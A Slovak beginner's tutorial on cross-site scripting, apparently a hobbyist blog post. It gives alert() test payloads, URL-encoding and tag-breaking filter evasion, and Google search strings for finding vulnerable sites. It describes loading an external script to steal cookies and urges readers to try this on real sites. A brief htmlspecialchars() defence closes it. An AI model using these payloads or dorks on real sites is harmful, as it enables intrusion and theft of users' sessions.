XSS-Cross-Site Scripting

XSS alebo Cross-Site Scripting je najčastejšia chyba na dnešnom internete.Myslím že niektorým túto chybu netreba predstavovať ale predsa len.XSS spočíva vo vložení nášho zákerného kódu do nejakého vstupu na webe.Tento článok je len také info pre tých ktorý sa s XSS nikdy nestretli nije pre xss guru:)

ROZDELENIE

non-presistent

Doslovne ne-trvalý, normálne dočasný.Myslím že už nič viac netreba

Príklad:

Máme stránku o ktorej si myslime ze na nej moze byt xss ktora vyzera takto:

www.nasastranka.sk/search.php?premenna=nejakytext

Pýtate sa prečo search?Preto lebo n-p xss sa najčastejšie vyskytuje na stránkach s vyhladávaním tak preto:)Skúsme v url zmeniť "nejakytext" na

<script>alert(10)</script>

Čo sa stane?Ak je stránka náchylná na xss tak na nás vyskočí javascriptové okno s hlásením 10.To je ale ten najprimitívnejší útok xss aký môže byť.Skúsme teraz do url napísať

<script>alert("XSS")</script>

ak na nás vyskočí okno s nápisom xss znamená to že stránka nefiltruje úvodzovky a môžme do alertu vypísať aj text.Takže keď do okna vypíšeme "HACKED BY VASEMENO" a posleme url kamarátovi ktorý sa v tom vôbec nevyzná bude mysliet že si tu stránku ste hackli vy:)Verte ja som tak presvedčil už veľa neznalých luďí ale potom som im pravdu povedal O:-)

Takže dalej.XSS môžme využiť aj nasledovne:

www.nasastranka.sk/search.php?premenna=http://nasweb.sk/zakernyskript.js

obsah nášho zákerného skriptu môže napr. zmeniť html kod stranky,môžme prostredníctvom neho ukradnúť cookies alebo ak chcete niekomu poriadne zneprijemniť život tak môže obsahovať tisíc alertov:) Ale o tom už neskôr, keď budem javascript plne ovládať napíšem článok ktorý sa bude tomuto venovať:)

presistent

Presistent xss je problém fór, návštevních kníh atd.Spočíva v tom že data ktoré vložíme sa zapíšu do súboru alebo do databázy a pri každom načítaní stránky sa nami vložený kód vykoná.Keď napr. vložíme alert, tento alert vyskočí každému kto si stránku otvorí.Akebo napr. vložíme xss ktorý bude kradnúť cookies do nejakého často navštevovaného threadu na fóre ukradne cookies každému užívateľovi ktorý si bude správu prečítať.Je to vlastne to isté ako n-p len to tam uvidí každý a nielen vy:)

Pár vecí čo sa vám zíde

 

Maskovanie

V prípade že do vstupu nemožeme písať úvodzovky a väčšina blokuje aj <script></script> , môžeme celý kód zakódovať do hexa kódu.Kód <script>alert(10)</script> by potom vyzeral nasledovne:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%30%29%3C%2F%73%63%72%69%70%74%3E

Maskovať môžeme aj inými spôsobmi napr. napísaním "> pred kód.Tag ktorý je pred tým sa tak ukončí a vykoná sa XSS.

Hľadanie

Stačí zadať do googlu ten správny task;-).Kedže xss sa vyskytuje na search stránkach napr. inurl:search.php.Za pol hodinku máte aspoň 8 deravých stránok.Ak chcete presistent tak napr. inurl:forum.php.GOOD LUCK

Obrana

V php jednoducho použite funkciu htmlspecialchars().To ako ju použiť si už naštudujte sami:P